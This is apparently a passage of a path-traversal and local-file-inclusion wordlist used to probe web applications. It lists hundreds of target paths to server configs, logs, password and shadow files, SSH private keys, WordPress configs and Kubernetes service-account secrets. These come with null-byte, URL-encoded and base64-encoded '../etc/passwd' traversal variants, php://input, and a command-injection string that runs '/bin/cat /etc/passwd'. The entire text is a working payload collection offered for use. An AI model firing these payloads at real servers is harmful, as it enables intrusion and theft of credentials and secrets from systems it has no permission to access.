/usr/local/apache2/logs/audit_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error.log%00
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/error_log%00
/usr/local/apache2/logs/lighttpd.error.log
/usr/local/apache2/logs/lighttpd.log
/usr/local/apache22/conf/httpd.conf
/usr/local/apache22/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf%00
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf%00
/usr/local/apps/apache22/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs%00
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/access_log%00
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/error_log%00
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/license_log%00
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/login_log%00
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/stats_log%00
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf%00
/usr/local/etc/apache/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache/vhosts.conf%00
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf%00
/usr/local/etc/apache2/httpd.conf
/usr/local/etc/apache2/vhosts.conf
/usr/local/etc/apache22/conf/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/httpd/conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf%00
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/lighttpd.conf
/usr/local/etc/lighttpd.conf.new
/usr/local/etc/nginx/nginx.conf
/usr/local/etc/php.ini
/usr/local/etc/php.ini%00
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf%00
/usr/local/etc/pureftpd.pdb
/usr/local/etc/pureftpd.pdb%00
/usr/local/etc/smb.conf
/usr/local/etc/webmin/miniserv.conf
/usr/local/etc/webmin/miniserv.users
/usr/local/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf%00
/usr/local/jakarta/dist/tomcat/conf/context.xml
/usr/local/jakarta/dist/tomcat/conf/jakarta.conf
/usr/local/jakarta/dist/tomcat/conf/logging.properties
/usr/local/jakarta/dist/tomcat/conf/server.xml
/usr/local/jakarta/dist/tomcat/conf/workers.properties
/usr/local/jakarta/dist/tomcat/logs/mod_jk.log
/usr/local/jakarta/tomcat/conf/context.xml
/usr/local/jakarta/tomcat/conf/jakarta.conf
/usr/local/jakarta/tomcat/conf/logging.properties
/usr/local/jakarta/tomcat/conf/server.xml
/usr/local/jakarta/tomcat/conf/workers.properties
/usr/local/jakarta/tomcat/logs/catalina.err
/usr/local/jakarta/tomcat/logs/catalina.out
/usr/local/jakarta/tomcat/logs/mod_jk.log
/usr/local/lib/php.ini
/usr/local/lib/php.ini%00
/usr/local/lighttpd/conf/lighttpd.conf
/usr/local/lighttpd/log/access.log
/usr/local/lighttpd/log/lighttpd.error.log
/usr/local/logs/access.log
/usr/local/logs/samba.log
/usr/local/lsws/conf/httpd_conf.xml
/usr/local/lsws/logs/error.log
/usr/local/mysql/data/mysql-bin.index
/usr/local/mysql/data/mysql-bin.log
/usr/local/mysql/data/mysql-slow.log
/usr/local/mysql/data/mysql.err
/usr/local/mysql/data/mysql.log
/usr/local/mysql/data/mysqlderror.log
/usr/local/mysql/data/{HOST}.err
/usr/local/nginx/conf/nginx.conf
/usr/local/pgsql/bin/pg_passwd
/usr/local/pgsql/data/passwd
/usr/local/pgsql/data/pg_hba.conf
/usr/local/pgsql/data/pg_log
/usr/local/pgsql/data/postgresql.conf
/usr/local/pgsql/data/postgresql.log
/usr/local/php/apache.conf
/usr/local/php/apache.conf.php
/usr/local/php/apache2.conf
/usr/local/php/apache2.conf.php
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf%00
/usr/local/php/httpd.conf.ini
/usr/local/php/httpd.conf.php
/usr/local/php/httpd.conf.php%00
/usr/local/php/lib/php.ini
/usr/local/php/lib/php.ini%00
/usr/local/php4/apache.conf
/usr/local/php4/apache.conf.php
/usr/local/php4/apache2.conf
/usr/local/php4/apache2.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf%00
/usr/local/php4/httpd.conf.php
/usr/local/php4/httpd.conf.php%00
/usr/local/php4/lib/php.ini
/usr/local/php4/lib/php.ini%00
/usr/local/php5/apache.conf
/usr/local/php5/apache.conf.php
/usr/local/php5/apache2.conf
/usr/local/php5/apache2.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf%00
/usr/local/php5/httpd.conf.php
/usr/local/php5/httpd.conf.php%00
/usr/local/php5/lib/php.ini
/usr/local/php5/lib/php.ini%00
/usr/local/psa/admin/conf/php.ini
/usr/local/psa/admin/conf/site_isolation_settings.ini
/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php
/usr/local/psa/admin/logs/httpsd_access_log
/usr/local/psa/admin/logs/panel.log
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pure-ftpd.conf%00
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb%00
/usr/local/pureftpd/etc/pureftpd.pdn
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/sbin/pure-config.pl%00
/usr/local/samba/lib/log.user
/usr/local/samba/lib/smb.conf.user
/usr/local/sb/config
/usr/local/squirrelmail/www/README
/usr/local/www/logs/httpd_log
/usr/local/www/logs/thttpd_log
/usr/local/zeus/web/global.cfg
/usr/local/zeus/web/log/errors
/usr/pkg/etc/httpd/httpd-default.conf
/usr/pkg/etc/httpd/httpd-vhosts.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/pkgsrc/net/pureftpd/
/usr/pkgsrc/net/pureftpd/%00
/usr/pkgsrc/net/pureftpd/pure-ftpd.conf
/usr/pkgsrc/net/pureftpd/pureftpd.passwd
/usr/pkgsrc/net/pureftpd/pureftpd.pdb
/usr/ports/contrib/pure-ftpd/
/usr/ports/contrib/pure-ftpd/%00
/usr/ports/contrib/pure-ftpd/pure-ftpd.conf
/usr/ports/contrib/pure-ftpd/pureftpd.passwd
/usr/ports/contrib/pure-ftpd/pureftpd.pdb
/usr/ports/ftp/pure-ftpd/
/usr/ports/ftp/pure-ftpd/%00
/usr/ports/ftp/pure-ftpd/pure-ftpd.conf
/usr/ports/ftp/pure-ftpd/pureftpd.passwd
/usr/ports/ftp/pure-ftpd/pureftpd.pdb
/usr/ports/net/pure-ftpd/
/usr/ports/net/pure-ftpd/%00
/usr/ports/net/pure-ftpd/pure-ftpd.conf
/usr/ports/net/pure-ftpd/pureftpd.passwd
/usr/ports/net/pure-ftpd/pureftpd.pdb
/usr/sbin/mudlogd
/usr/sbin/mudpasswd
/usr/sbin/pure-config.pl
/usr/sbin/pure-config.pl%00
/usr/share/adduser/adduser.conf
/usr/share/logs/catalina.err
/usr/share/logs/catalina.out
/usr/share/pixmaps/debian-logo.png
/usr/share/squirrelmail/config/config.php
/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
/usr/share/tomcat/logs/catalina.err
/usr/share/tomcat/logs/catalina.out
/usr/share/tomcat6/conf/context.xml
/usr/share/tomcat6/conf/logging.properties
/usr/share/tomcat6/conf/server.xml
/usr/share/tomcat6/conf/workers.properties
/usr/share/tomcat6/logs/catalina.err
/usr/share/tomcat6/logs/catalina.out
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/log/xferlog%00
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/messages.0
/var/adm/messages.1
/var/adm/messages.2
/var/adm/messages.3
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/conf/httpd.conf
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache2/config.inc
/var/cpanel/cpanel.config
/var/cpanel/cpanel.config%00
/var/cpanel/tomcat.options
/var/cron/log
/var/data/mysql-bin.index
/var/db/shadow/hash
/var/htmp
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/lib/mysql/my.cnf%00
/var/lib/mysql/mysql/user.MYD
/var/lib/pgsql/data/postgresql.conf
/var/lib/php/session/sess_<sessid>
/var/lib/php5/session/sess_<sessid>
/var/lib/squirrelmail/prefs/squirrelmail.log
/var/lighttpd.log
/var/local/www/conf/php.ini
/var/local/www/conf/php.ini%00
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/Xorg.0.log
/var/log/access.log
/var/log/access.log%00
/var/log/access_log
/var/log/access_log%00
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log%00
/var/log/apache/access_log
/var/log/apache/access_log%00
/var/log/apache/error.log
/var/log/apache/error.log%00
/var/log/apache/error_log
/var/log/apache/error_log%00
/var/log/apache2/access.log
/var/log/apache2/access.log%00
/var/log/apache2/access_log
/var/log/apache2/access_log%00
/var/log/apache2/error.log
/var/log/apache2/error.log%00
/var/log/apache2/error_log
/var/log/apache2/error_log%00
/var/log/apache2/squirrelmail.err.log
/var/log/apache2/squirrelmail.log
/var/log/auth
/var/log/auth.log
/var/log/auth.log.0
/var/log/auth.log.0.gz
/var/log/auth.log.1
/var/log/auth.log.1.gz
/var/log/auth.log.2
/var/log/auth.log.2.gz
/var/log/auth.log.3
/var/log/auth.log.3.gz
/var/log/authlog
/var/log/boot
/var/log/boot.log
/var/log/chttp.log
/var/log/cron.log
/var/log/cron/var/log/postgres.log
/var/log/cups/error.log
/var/log/daemon.log
/var/log/daemon.log.1
/var/log/data/mysql-bin.index
/var/log/debug
/var/log/dmesg
/var/log/dmessage
/var/log/dpkg.log
/var/log/error.log
/var/log/error.log%00
/var/log/error_log
/var/log/error_log%00
/var/log/exim.paniclog
/var/log/exim/mainlog
/var/log/exim/mainlog%00
/var/log/exim/paniclog
/var/log/exim/paniclog%00
/var/log/exim/rejectlog
/var/log/exim/rejectlog%00
/var/log/exim_mainlog
/var/log/exim_mainlog%00
/var/log/exim_paniclog
/var/log/exim_paniclog%00
/var/log/exim_rejectlog
/var/log/exim_rejectlog%00/etc/issue
/var/log/exim_rejectlog/etc/passwd
/var/log/faillog
/var/log/ftp-proxy
/var/log/ftp-proxy%00
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy/ftp-proxy.log%00
/var/log/ftplog
/var/log/ftplog%00
/var/log/httpd-access.log
/var/log/httpd-access.log%00
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access.log%00
/var/log/httpd/access_log
/var/log/httpd/access_log%00
/var/log/httpd/error.log
/var/log/httpd/error.log%00
/var/log/httpd/error_log
/var/log/httpd/error_log%00
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/ipfw
/var/log/ipfw.log
/var/log/ipfw.today
/var/log/ipfw/ipfw.log
/var/log/kern.log
/var/log/kern.log.1
/var/log/kernel.log
/var/log/lastlog
/var/log/lighttpd
/var/log/lighttpd.access.log
/var/log/lighttpd.error.log
/var/log/lighttpd/
/var/log/lighttpd/access.log
/var/log/lighttpd/access.www.log
/var/log/lighttpd/error.log
/var/log/lighttpd/error.www.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/lighttpd/{DOMAIN}/access.log
/var/log/lighttpd/{DOMAIN}/error.log
/var/log/log.smb
/var/log/mail.err
/var/log/mail.info
/var/log/mail.log
/var/log/mail.warn
/var/log/maillog
/var/log/maillog%00
/var/log/message
/var/log/messages
/var/log/messages.0
/var/log/messages.0.gz
/var/log/messages.1
/var/log/messages.1.gz
/var/log/messages.2
/var/log/messages.2.gz
/var/log/messages.3
/var/log/messages.3.gz
/var/log/messages.log
/var/log/muddleftpd
/var/log/muddleftpd.conf
/var/log/mysql-bin.index
/var/log/mysql.err
/var/log/mysql.log
/var/log/mysql.log%00
/var/log/mysql/data/mysql-bin.index
/var/log/mysql/mysql-bin.index
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-bin.log%00
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql-slow.log%00
/var/log/mysql/mysql.log
/var/log/mysql/mysql.log%00
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/mysqlderror.log%00
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/nginx.access_log
/var/log/nginx.error_log
/var/log/nginx/access.log
/var/log/nginx/access_log
/var/log/nginx/error.log
/var/log/nginx/error_log
/var/log/pgsql/pgsql.log
/var/log/pgsql8.log
/var/log/pgsql_log
/var/log/pm-powersave.log
/var/log/poplog
/var/log/postgres/pg_backup.log
/var/log/postgres/postgres.log
/var/log/postgresql.log
/var/log/postgresql/main.log
/var/log/postgresql/postgres.log
/var/log/postgresql/postgresql-8.1-main.log
/var/log/postgresql/postgresql-8.3-main.log
/var/log/postgresql/postgresql-8.4-main.log
/var/log/postgresql/postgresql-9.0-main.log
/var/log/postgresql/postgresql-9.1-main.log
/var/log/postgresql/postgresql.log
/var/log/proftpd
/var/log/proftpd%00
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pure-ftpd/pure-ftpd.log%00
/var/log/pureftpd.log
/var/log/pureftpd.log%00
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/samba.log
/var/log/samba.log1
/var/log/samba.log2
/var/log/samba/log.nmbd
/var/log/samba/log.smbd
/var/log/secure
/var/log/secure.log
/var/log/smtpd
/var/log/spooler
/var/log/squirrelmail.log
/var/log/sso/sso.log
/var/log/sw-cp-server/error_log
/var/log/syslog
/var/log/syslog.0
/var/log/syslog.0.gz
/var/log/syslog.1
/var/log/syslog.1.gz
/var/log/syslog.2
/var/log/syslog.2.gz
/var/log/syslog.3
/var/log/syslog.3.gz
/var/log/syslog.log
/var/log/telnetd
/var/log/thttpd_log
/var/log/tomcat6/catalina.out
/var/log/ufw.log
/var/log/user.log
/var/log/user.log.1
/var/log/utmp
/var/log/vmware/hostd-1.log
/var/log/vmware/hostd.log
/var/log/vsftpd.log
/var/log/vsftpd.log%00
/var/log/webmin/miniserv.log
/var/log/wtmp
/var/log/xferlog
/var/log/xferlog%00
/var/log/yum.log
/var/logs/access.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mail/apache
/var/mail/nobody
/var/mail/root
/var/mail/www
/var/mail/www-data
/var/mysql-bin.index
/var/mysql.log
/var/mysql.log%00
/var/nm2/postgresql.conf
/var/postgresql/db/postgresql.conf
/var/postgresql/log/postgresql.log
/var/root/.bash_history
/var/root/.sh_history
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/secrets/kubernetes.io/serviceaccount
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/cron/crontabs/root
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/webmin/miniserv.log
/var/www/.bash_history
/var/www/.lighttpdpassword
/var/www/conf
/var/www/conf/httpd.conf
/var/www/conf/httpd.conf%00
/var/www/config.php
/var/www/html/.htaccess
/var/www/html/squirrelmail-1.2.9/config/config.php
/var/www/html/squirrelmail/config/config.php
/var/www/html/wordpress/wp-config.php
/var/www/html/wp-config.php
/var/www/html/wp/wp-config.php
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log%00
/var/www/logs/access_log
/var/www/logs/access_log%00
/var/www/logs/error.log
/var/www/logs/error.log%00
/var/www/logs/error_log
/var/www/logs/error_log%00
/var/www/mgr/logs/access.log
/var/www/mgr/logs/access_log
/var/www/mgr/logs/error.log
/var/www/mgr/logs/error_log
/var/www/sitename/htdocs/
/var/www/squirrelmail/config/config.php
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/web/conf/php.ini
/web/conf/php.ini%00
/www/apache/conf/httpd.conf
/www/conf/httpd.conf
/www/logs/freebsddiary-access_log
/www/logs/freebsddiary-error.log
/www/logs/proftpd.system.log
/www/logs/proftpd.system.log%00
/xampp/FileZillaFTP/FileZilla Server.xml
/xampp/MercuryMail/mercury.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/xampp/apache/logs/access.log
/xampp/apache/logs/error.log
/xampp/htdocs/aca.txt
/xampp/htdocs/admin.php
/xampp/htdocs/leer.txt
/xampp/mysql/data/mysql-bin.index
/xampp/mysql/data/mysql.err
/xampp/mysql/data/{HOST}.err
/xampp/php/php.ini
/xampp/phpMyAdmin/config.inc.php
/xampp/sendmail/sendmail.ini
/xampp/sendmail/sendmail.log
/xampp/webalizer/webalizer.conf
/xampp\apache\bin\php.ini
/xampp\apache\bin\php.ini%00
=3D /.. . %2f..
L21hc3Rlci5wYXNzd2Q=
L2V0Yy9tYXN0ZXIucGFzc3dk
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
\..\..\..\..\..\..\..\..\..\..\boot.ini
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
\Program Files\Apache Group\Apache2\conf\httpd.conf
\Program Files\Apache Group\Apache\conf\httpd.conf
\Program Files\Apache Group\Apache\logs\access.log
\Program Files\Apache Group\Apache\logs\error.log
\Program Files\xampp\apache\conf\httpd.confetc/passwd
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
\apache2\log\access.log
\apache2\log\access_log
\apache2\log\error.log
\apache2\log\error_log
\apache2\logs\access.log
\apache2\logs\access_log
\apache2\logs\error.log
\apache2\logs\error_log
\apache\log\access.log
\apache\log\access_log
\apache\log\error.log
\apache\log\error_log
\apache\logs\access.log
\apache\logs\access_log
\apache\logs\error.log
\apache\logs\error_log
\log\access.log
\log\access_log
\log\error.log
\log\error_log
\log\httpd\access_log
\log\httpd\error_log
\logs\access.log
\logs\access_log
\logs\error.log
\logs\error_log
\logs\httpd\access_log
\logs\httpd\error_log
\mysql\bin\my.ini
\opt\xampp\logs\access.log
\opt\xampp\logs\access_log
\opt\xampp\logs\error.log
\opt\xampp\logs\error_log
\xampp\FileZillaFTP\FileZilla Server.xml
\xampp\FileZillaFTP\Logs
\xampp\FileZillaFTP\Logs\access.log
\xampp\FileZillaFTP\Logs\error.log
\xampp\MercuryMail\LOGS\access.log
\xampp\MercuryMail\LOGS\error.log
\xampp\MercuryMail\mercury.ini
\xampp\apache\conf\httpd.conf
\xampp\apache\logs\access.log
\xampp\apache\logs\error.log
\xampp\mysql\data\mysql.err
\xampp\phpMyAdmin\config.inc
\xampp\phpMyAdmin\config.inc.php
\xampp\phpMyAdmin\phpinfo.php
\xampp\php\php.ini
\xampp\phpmyadmin\config.inc
\xampp\phpmyadmin\config.inc.php
\xampp\phpmyadmin\phpinfo.php
\xampp\sendmail\sendmail.ini
\xampp\sendmail\sendmail.log
\xampp\tomcat\conf\tomcat-users.xml
\xampp\tomcat\conf\web.xml
\xampp\webalizer\webalizer.conf
\xampp\webdav\webdav.txt
\..\\\..\\\..\\\
_config.php
admin/access_log
config.asp
config.inc.php
config.js
config.php
d:\AppServ\MySQL
d:\System32\Inetsrv\metabase.xml
data.php
database.asp
database.js
database.php
db.php
dbase.php a
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
etc%c0%afpasswd
etc%c0%afpasswd%00
etc/passwd
etc/passwd%00
etc/shadow%00
install.php
member/.htpasswd
members/.htpasswd
pass.dat
passwd
passwd.dat
php://input
proc/self/environ
proc/self/environ%00
root/.htpasswd
user/.htpasswd
users.db.php
users/.htpasswd
~/.Xdefaults
~/.Xresources
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.xinitrc
~/.xsession